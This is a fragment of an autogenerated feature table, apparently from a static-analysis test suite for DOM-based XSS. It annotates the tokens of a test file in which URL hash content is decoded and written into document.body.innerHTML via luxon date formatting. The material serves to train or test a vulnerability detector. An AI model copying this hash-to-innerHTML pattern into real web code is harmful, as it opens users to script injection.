autogenerated/Xss/DomBasedXss/dates.js:46:43:46:50 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:43:46:50 | location | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:43:46:50 | location | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:43:46:50 | location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:52:46:55 | hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:52:46:55 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:52:46:55 | hash | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:52:46:55 | hash | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:52:46:55 | hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:57:46:65 | substring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:57:46:65 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:57:46:65 | substring | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:57:46:65 | substring | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:57:46:65 | substring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:46:67:46:67 | 1 | CalleeFlexibleAccessPath | window.location.hash.substring | | autogenerated/Xss/DomBasedXss/dates.js:46:67:46:67 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:46:67:46:67 | 1 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -13166,12 +98188,109 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:46:67:46:67 | 1 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:46:67:46:67 | 1 | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:46:67:46:67 | 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:12 | document | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:17 | document.body | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:27 | documen ... nerHTML | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:90 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:90 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:90 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:90 | documen ... aint)}` | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:5:48:90 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:14:48:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:14:48:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:14:48:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:14:48:17 | body | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:14:48:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:19:48:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:19:48:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:19:48:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:19:48:27 | innerHTML | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:19:48:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:48:31:48:90 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:48:31:48:90 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:48:31:48:90 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:48:31:48:90 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:48:31:48:90 | `Time i ... aint)}` | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:48:31:48:90 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:32:48:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:32:48:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:32:48:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:32:48:39 | Time is | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:32:48:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:32:48:39 | Time is | stringConcatenatedWith | -endpoint- DateTime.now().plus().toFormat() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:49 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:49 | DateTime | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:49 | DateTime | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:49 | DateTime | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:49 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:53 | DateTime.now | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:53 | DateTime.now | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:53 | DateTime.now | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:53 | DateTime.now | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:53 | DateTime.now | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | DateTime.now() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | DateTime.now() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | DateTime.now() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | DateTime.now() | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | DateTime.now() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | exceptional return of DateTime.now() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | exceptional return of DateTime.now() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | exceptional return of DateTime.now() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | exceptional return of DateTime.now() | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:55 | exceptional return of DateTime.now() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:60 | DateTime.now().plus | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:60 | DateTime.now().plus | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:60 | DateTime.now().plus | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:60 | DateTime.now().plus | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:60 | DateTime.now().plus | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | DateTim ... rs: 1}) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | DateTim ... rs: 1}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | DateTim ... rs: 1}) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | DateTim ... rs: 1}) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | DateTim ... rs: 1}) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | exceptional return of DateTim ... rs: 1}) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | exceptional return of DateTim ... rs: 1}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | exceptional return of DateTim ... rs: 1}) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | exceptional return of DateTim ... rs: 1}) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:72 | exceptional return of DateTim ... rs: 1}) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:81 | DateTim ... oFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:81 | DateTim ... oFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:81 | DateTim ... oFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:81 | DateTim ... oFormat | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:81 | DateTim ... oFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | DateTim ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | DateTim ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | DateTim ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | DateTim ... (taint) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | DateTim ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | DateTim ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | exceptional return of DateTim ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | exceptional return of DateTim ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | exceptional return of DateTim ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | exceptional return of DateTim ... (taint) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:42:48:88 | exceptional return of DateTim ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:51:48:53 | now | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:51:48:53 | now | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:51:48:53 | now | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:51:48:53 | now | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:51:48:53 | now | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:57:48:60 | plus | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:57:48:60 | plus | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:57:48:60 | plus | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:57:48:60 | plus | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:57:48:60 | plus | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:48:62:48:71 | {years: 1} | CalleeFlexibleAccessPath | DateTime.now().plus | | autogenerated/Xss/DomBasedXss/dates.js:48:62:48:71 | {years: 1} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:48:62:48:71 | {years: 1} | calleeImports | luxon | @@ -13180,6 +98299,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:48:62:48:71 | {years: 1} | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:48:62:48:71 | {years: 1} | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:48:62:48:71 | {years: 1} | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:67 | years | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:67 | years | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:67 | years | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:67 | years | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:67 | years | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:63:48:70 | years: 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:48:70:48:70 | 1 | CalleeFlexibleAccessPath | DateTime.now().plus | | autogenerated/Xss/DomBasedXss/dates.js:48:70:48:70 | 1 | InputAccessPathFromCallee | 0.years | | autogenerated/Xss/DomBasedXss/dates.js:48:70:48:70 | 1 | InputArgumentIndex | 0 | @@ -13190,6 +98324,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:48:70:48:70 | 1 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:48:70:48:70 | 1 | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:48:70:48:70 | 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:48:74:48:81 | toFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:48:74:48:81 | toFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:48:74:48:81 | toFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:48:74:48:81 | toFormat | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:48:74:48:81 | toFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:48:83:48:87 | taint | CalleeFlexibleAccessPath | DateTime.now().plus().toFormat | | autogenerated/Xss/DomBasedXss/dates.js:48:83:48:87 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:48:83:48:87 | taint | calleeImports | luxon | @@ -13198,12 +98337,99 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:48:83:48:87 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:48:83:48:87 | taint | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:48:83:48:87 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:12 | document | enclosingFunctionName | luxon | +| 